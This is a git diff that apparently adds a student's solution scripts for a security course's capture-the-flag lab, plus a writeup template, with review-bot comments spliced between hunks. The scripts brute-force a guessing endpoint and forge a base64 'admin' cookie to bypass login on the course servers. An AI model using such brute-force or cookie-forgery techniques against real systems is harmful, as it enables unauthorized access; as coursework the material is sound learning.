diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..60047ca
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "pa/writeups"]
+ path = pa/writeups
+ url = git@gitlab.rnl.tecnico.ulisboa.pt:ssof2526/writeups/ist1106196.git
diff --git a/pa/lab2/chall_guess_big_number.py b/pa/lab2/chall_guess_big_number.py
new file mode 100644
index 0000000..72a2350
--- /dev/null
+++ b/pa/lab2/chall_guess_big_number.py
@@ -0,0 +1,23 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25052"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+top = 100000
+bot = 1
+
+while top - bot > 1:
+ guess = int((top + bot) / 2)
+ resp = sesh.get(BASE+"/number/"+str(guess))
+ content = resp.content.decode('utf-8')
+ print(guess, content)
+ if "SSof" in content:
+ break
+ elif "Higher" in content:
+ bot = guess
+ else:
+ top = guess
+
diff --git a/pa/lab2/chall_guess_number.py b/pa/lab2/chall_guess_number.py
new file mode 100644
index 0000000..c33ef7e
--- /dev/null
+++ b/pa/lab2/chall_guess_number.py
@@ -0,0 +1,15 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25051"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+for guess in range(1,1000):
+ resp = sesh.get(BASE+"/number/"+str(guess))
+ content = resp.content.decode('utf-8')
+ if "SSof" in content:
+ break
+
+ print(guess, content)
diff --git a/pa/lab2/chall_pwntools_sockets.py b/pa/lab2/chall_pwntools_sockets.py
new file mode 100644
index 0000000..640e3a1
--- /dev/null
+++ b/pa/lab2/chall_pwntools_sockets.py
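Review bot: The bisection in chall_guess_big_number.py never tests its own bounds: `bot` and `top` are updated as exclusive limits, so if the secret can be 1 or 100000 the loop exits at `top - bot == 1` without ever guessing it and without reporting failure; start from `bot = 0` / `top = 100001` and print a message when the loop ends without a match. The `else` branch also treats any response that lacks "Higher" — an error page, a rate-limit reply, a 5xx — as "lower", silently corrupting the search; add `resp.raise_for_status()` after each `sesh.get(..., timeout=10)` so a failed request stops the run instead of steering it. `int((top + bot) / 2)` is clearer as `(top + bot) // 2`, and the first `content` assignment is overwritten unused.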
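Review bot: In chall_guess_number.py the winning response is never shown: `print(guess, content)` sits after the `break`, so the one reply that contains "SSof" is the only one not printed; move the print above the `if`, as chall_guess_big_number.py does. `range(1,1000)` stops at 999, so if the secret can be 1000 it is never tried — `range(1, 1001)` — and when the loop runs out nothing signals that no match was found. As in the sibling script, the requests carry no `timeout=` and no status check, so an error page is silently treated as a miss.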
@@ -0,0 +1,20 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25055
+
+conn = remote(HOST, PORT)
+line = conn.recvline_contains(b"until").decode('utf-8')
+
+target = line[54:-1]
+current = "0"
+print("Target:", target)
+
+while target != current:
+ conn.send(b"MORE\n")
+ new = conn.recvline_contains(b"Here you have").decode('utf-8')[15:]
+ current = str(int(current) + int(new))
+ print("New:", new, "Current:", current)
+
+conn.send(b"FINISH\n")
+print(conn.recvall().decode('utf-8'))
diff --git a/pa/lab2/chall_secure.py b/pa/lab2/chall_secure.py
new file mode 100644
index 0000000..47da2a2
--- /dev/null
+++ b/pa/lab2/chall_secure.py
@@ -0,0 +1,22 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25056"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+
+resp = sesh.post(BASE+"/", data={"username": "admin"})
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)
+
+for c in sesh.cookies:
+ if c.name == "user":
+ c.value = "YWRtaW4="
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)
diff --git a/pa/template_wu.md b/pa/template_wu.md
new file mode 100644
index 0000000..f7361db
--- /dev/null
+++ b/pa/template_wu.md
@@ -0,0 +1,22 @@
+# Challenge XYZ writeup
+
+- Vulnerability: What type of vulnerability is being exploited
+ - _Eg, SQL Injection, XSS, Endpoint is vulnerable to brute-force attack, etc_
+- Where: Where is the vulnerability present
+ - _Eg, `/guess/number` endpoint_
+- Impact: What results of exploiting this vulnerability
+ - _Eg, allows to find the server's guess by enumeration_
+- NOTE: Any other observation
+
+## Steps to reproduce
+
+1. Do this
+2. Do that
+3. ...
+N. Now something bad happened
+
+## POC
+
+```Py
+
+```
diff --git a/pa/writeups b/pa/writeups
new file mode 160000
index 0000000..a67c391
--- /dev/null
+++ b/pa/writeups
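Review bot: In chall_pwntools_sockets.py, `line[54:-1]` and `[15:]` are fixed character offsets into server text, so any change in the banner wording silently yields a wrong `target` or a `ValueError` from `int(new)` with no hint of the cause; parse relative to a delimiter (if the number is the last token, `line.split()[-1]`) and document the expected line format in a comment. The loop condition `target != current` compares strings, so a trailing `\r` in `target`, or a running total that overshoots it, never terminates — compare `int(target)` with `int(current)` and stop once `current` exceeds the target. `conn.recvall()` blocks until the peer closes the socket; pass `timeout=` so a server that keeps the connection open does not hang the script.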
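Review bot: In chall_secure.py, `"YWRtaW4="` is an undocumented literal; it is the base64 form of the username posted a few lines above, so derive it with `base64.b64encode(b"admin").decode()` (adding `import base64`) or at least comment what it encodes, so a reader of the writeup does not have to decode it by hand. Mutating `c.value` while iterating the jar works but bypasses the jar's API; `sesh.cookies.set("user", ...)` is the documented way, provided the jar holds a single `user` cookie. The three `resp = sesh.get(...)` / `content = ...` stanzas repeat the same two lines, carry no `timeout=`, and the final response is only printed, never checked, so the script cannot tell a successful run from a failed one.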
@@ -0,0 +1 @@
+Subproject commit a67c3913db2df515699d31ebd013a395f5c24b2f